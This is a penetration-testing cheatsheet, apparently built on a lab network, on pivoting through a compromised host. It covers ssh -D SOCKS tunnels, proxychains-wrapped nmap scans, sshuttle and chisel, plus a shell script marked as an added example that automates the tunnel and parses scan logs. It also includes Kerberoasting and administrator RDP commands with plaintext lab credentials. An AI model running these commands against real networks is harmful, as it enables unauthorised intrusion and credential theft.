Charlie Belmer A Pivot Cheatsheet for Pentesters
Log in to the pivot host with the private key stored in the file pivot (this box is the jump point for everything below):
ssh -i pivot root@192.168.218.139
Proxy
ProxyChains:
cat /etc/proxychains4.conf
Check the [ProxyList] section at the bottom for the SOCKS proxy IP and port (the default, and this example, is socks4 127.0.0.1 9050); the port you bind with ssh -D below has to match it. Older proxychains 3.x reads /etc/proxychains.conf instead.
ssh -f -N -D 9050 -i pivot root@192.168.218.139
-f backgrounds the SSH session once it has authenticated
-N runs no remote command, just the forwarding (great for forwarding ports)
-D 9050 is dynamic forwarding: it opens a SOCKS proxy on 127.0.0.1:9050, and every connection sent to that port leaves the network from the pivot host
proxychains nmap -p88 10.10.10.225 #checks kerberos: 88/tcp open usually means a domain controller
proxychains nmap 10.10.10.225
The 2nd will check for open ports on that IP. proxychains logs one line per connection it relays: the ones ending in "OK" reached a listening port and are open, the ones ending in "denied" or "socket error or timeout" are closed or filtered.
Sometimes the scan doesn't work, you can:
proxychains nmap 10.10.10.225 -sT
-sT is a TCP connect scan. A SOCKS proxy only carries complete TCP connections, so nmap's default SYN scan (raw packets when run as root) and its ICMP host-discovery probes never enter the tunnel and go out of your own interface instead. Use -sT, add -Pn so nmap does not write the host off as "down" before scanning it, and -n to avoid slow name lookups through the proxy.
You can run attacks through proxychains, e.g. Kerberoasting with Impacket's GetUserSPNs.py (requests service tickets for every account with an SPN, using fcastle's credentials against the DC):
proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip 10.10.10.225 -request
Access a machine through RDP over proxychains (xfreerdp is a plain TCP client, so it proxies cleanly):
proxychains xfreerdp /u:administrator /p:'Hacker321!' /v:10.10.10.225
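The ssh -D / proxychains steps above as one script. This is an added example, not code from the cheatsheet: the key file pivot, pivot host 192.168.218.139, target 10.10.10.225 and SOCKS port 9050 are the values used on this page, the script name pivot.sh and the proxychains4 binary name are assumptions, and the proxychains log lines at the bottom are constructed so the parser can be exercised without a network.

```shell
#!/bin/sh
# Added example (not from the cheatsheet): the ssh -D / proxychains workflow
# as a script. Assumed values, taken from the commands on the page: key file
# "pivot", pivot host 192.168.218.139, target 10.10.10.225, SOCKS port 9050.
PIVOT_KEY=pivot
PIVOT_HOST=root@192.168.218.139
SOCKS_PORT=9050

# Emit a proxychains config whose [ProxyList] matches the port ssh -D opens.
# ssh -D speaks SOCKS5, so declare socks5 instead of the default socks4 line.
# proxy_dns sends hostname lookups through the tunnel as well.
make_proxychains_conf() {
    port="${1:-9050}"
    cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $port
EOF
}

# nmap options that work through a SOCKS proxy. The proxy only carries complete
# TCP connections, so the default SYN scan (raw packets) and the ICMP
# host-discovery probes would silently bypass it. -sT forces connect scans,
# -Pn skips host discovery and -n stops nmap resolving names.
nmap_proxy_args() {
    ports="${1:-22,88,135,139,445,3389}"
    printf '%s' "-sT -Pn -n -p $ports"
}

# Reduce proxychains' per-connection log (written to stderr, one line per
# connection attempt) to the target host:port of every attempt that ended in
# OK, i.e. the port accepted the connection. Handles both the proxychains-ng
# "[proxychains] Strict chain ... host:port ... OK" lines and the older
# "|S-chain|-<>-...-host:port-<><>-OK" format: the target is always the last
# host:port token on the line.
proxychains_open_ports() {
    grep 'OK *$' | while IFS= read -r line; do
        printf '%s\n' "$line" |
            grep -o '[0-9]\{1,3\}\(\.[0-9]\{1,3\}\)\{3\}:[0-9]\{1,5\}' | tail -n 1
    done | LC_ALL=C sort -u
}

# Pick out hosts with Kerberos (88/tcp) listening: in a Windows network that
# is almost always a domain controller, the host to hand to -dc-ip later.
kerberos_hosts() {
    grep ':88$' | cut -d: -f1 | LC_ALL=C sort -u
}

# The live procedure (needs the pivot and target reachable): write the config,
# open the SOCKS tunnel in the background, scan through it and keep the
# connections the chain reported as OK. The ssh process stays behind; kill it
# when the engagement step is done.
pivot_scan() {
    target="$1"
    conf=$(mktemp)
    make_proxychains_conf "$SOCKS_PORT" > "$conf"
    ssh -f -N -D "$SOCKS_PORT" -i "$PIVOT_KEY" "$PIVOT_HOST"
    # word-splitting of the option string is intended (no -q: we need the log)
    proxychains4 -f "$conf" nmap $(nmap_proxy_args "$2") "$target" 2>&1 |
        proxychains_open_ports
    rm -f "$conf"
}

# Constructed sample of proxychains output (both log formats) used to exercise
# the parser offline; a real run pipes pivot_scan's output instead.
SAMPLE_LOG='[proxychains] config file found: /tmp/pc.conf
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  10.10.10.225:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  10.10.10.225:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  10.10.10.225:8080  <--socket error or timeout!
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.225:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.225:22-<--denied'

sample_open_ports() { printf '%s\n' "$SAMPLE_LOG" | proxychains_open_ports; }
sample_kerberos_hosts() { sample_open_ports | kerberos_hosts; }

# Run the live scan only when asked: ./pivot.sh scan 10.10.10.225 [ports]
# Without arguments, show what the parser extracts from the sample log.
if [ "${1:-}" = "scan" ]; then
    pivot_scan "$2" "${3:-}"
else
    sample_open_ports
fi
```

Run without arguments it prints 10.10.10.225:3389, 10.10.10.225:445 and 10.10.10.225:88 from the sample, i.e. the same ports the cheatsheet tells you to read off the "OK" lines; the 8080 timeout and the 22 denial are dropped. With "scan" it performs the real tunnel and scan, and piping the result through kerberos_hosts gives the DC candidate for the -dc-ip argument used further down.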
sshuttle:
sshuttle -r root@10.10.155.5 10.10.10.0/24 --ssh-cmd "ssh -i pivot"
-r is the pivot host to SSH to, 10.10.10.0/24 is the subnet to route through it, and --ssh-cmd passes the key file to the ssh that sshuttle spawns. sshuttle installs local firewall rules (it will ask for sudo) that transparently send TCP traffic for that subnet down the tunnel, so you can directly nmap and run tools without a proxychains prefix as long as this terminal is open. Only TCP (and DNS, with --dns) is tunneled, so scan with nmap -sT -Pn here as well.
Chisel is also good: a single Go binary with a client and a server half that tunnels TCP over HTTP, so it works when the pivot has no SSH daemon and all you can do is drop a file on it. Its reverse SOCKS mode gives you the same local SOCKS proxy as ssh -D, which proxychains can use unchanged.